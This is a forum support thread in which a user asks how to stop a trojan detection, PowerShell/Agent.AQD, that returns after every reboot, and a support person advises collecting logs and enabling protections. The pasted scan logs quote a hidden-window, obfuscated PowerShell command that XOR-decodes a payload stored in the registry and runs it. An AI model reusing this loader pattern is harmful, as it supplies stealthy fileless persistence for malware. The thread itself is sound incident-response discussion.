nod32 detection PowerShell/Agent.AQD

[mic63 0]

Hello everybody in here,

i write about a problem i can't get out of.

Nod32 continuously detects what follows, cleans the infection but after a reboot the problem starts again.

The boot after, Nod32 again detects, cleans...reboot...again with this problem, and so on.

Some of you maybe has a suggestion to work it out once for all ?

Thanks for any kind help from you

Mik

P.S.: Hope i wrote correct to respect the forum rules

 

?Ora;Scanner;Tipo di oggetto;Oggetto;Rilevamento;Azione;Utente;Informazione;Hash;Prima visualizzazione
21/lug/2023 16:43:12;Scanner riga di comando;FILE;C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe;PowerShell/Agent.AQD trojan horse;pulito tramite eliminazione;KOMPUTER\mercurio;Si è verificato un evento durante un tentativo di esecuzione del seguente comando: "powershell.exe" -winDOwsTylE hIDdEn -CoMMAnD "iCm ([ScriPTblOCk]::CrEAte([sTRing]::join('', ((Get-iTEMprOperTY -path 'hklm:\SOfTWARE\AlieNwarEDB3A6N').'dB3A6nX6' | % { [chaR]($_ -BXor 229) }))))";B07C693CDB4DB69CE46B3D9E5005A0BD6AB579D8;
22/lug/2023 08:15:50;Scanner riga di comando;FILE;C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe;PowerShell/Agent.AQD trojan horse;pulito tramite eliminazione;KOMPUTER\mercurio;Si è verificato un evento durante un tentativo di esecuzione del seguente comando: "powershell.exe" -winDOwsTylE hIDdEn -CoMMAnD "iCm ([ScriPTblOCk]::CrEAte([sTRing]::join('', ((Get-iTEMprOperTY -path 'hklm:\SOfTWARE\AlieNwarEDB3A6N').'dB3A6nX6' | % { [chaR]($_ -BXor 229) }))))";B07C693CDB4DB69CE46B3D9E5005A0BD6AB579D8;
24/lug/2023 15:51:06;Scanner riga di comando;FILE;C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe;PowerShell/Agent.AQD trojan horse;pulito tramite eliminazione;KOMPUTER\mercurio;Si è verificato un evento durante un tentativo di esecuzione del seguente comando: "powershell.exe" -winDOwsTylE hIDdEn -CoMMAnD "iCm ([ScriPTblOCk]::CrEAte([sTRing]::join('', ((Get-iTEMprOperTY -path 'hklm:\SOfTWARE\AlieNwarEDB3A6N').'dB3A6nX6' | % { [chaR]($_ -BXor 229) }))))";B07C693CDB4DB69CE46B3D9E5005A0BD6AB579D8;

 

[Marcos 4,839]

Please collect logs with ESET Log Collector while selecting "Threat detection" in its menu.

Later you will delete the binary payload from the registry in HKLM\SOfTWARE\AlieNwarEDB3A6N but for now don't delete anything until we get the logs and find the loader.

[mic63 0]

Thanks Marcos, just done it.

Attached the two zip files created as results of log collector.eav_logs.zip

Hope i did everything correct

elc3ADC.tmp-samples.zip

[Marcos 4,839]

The machine has not been restarted almost for 2 days. Please restart it and see if the malware is cleaned from the registry during a startup scan. I don't see any reason why it wouldn't be since the Scheduled task is normally detected here.

Also I'd strongly recommend enabling:
Web access protection
Anti-Phishing protection
LiveGrid - feedback system

With Web access protection off you open the door to Internet-borne threats and we cannot help you clean the infection until ESET is configured properly for protection.

[mic63 0]

Hi Marcos

my pc works all day long during these days, with a couple of restarts every day

in any case i'll restart all the protections you just suggest to see what happens and if something changes

I searched also for the key HKLM\SOfTWARE\AlieNwarEDB3A6N in the registry but couldn't find it (humbled)

i'll write you in the next days

Thx for your help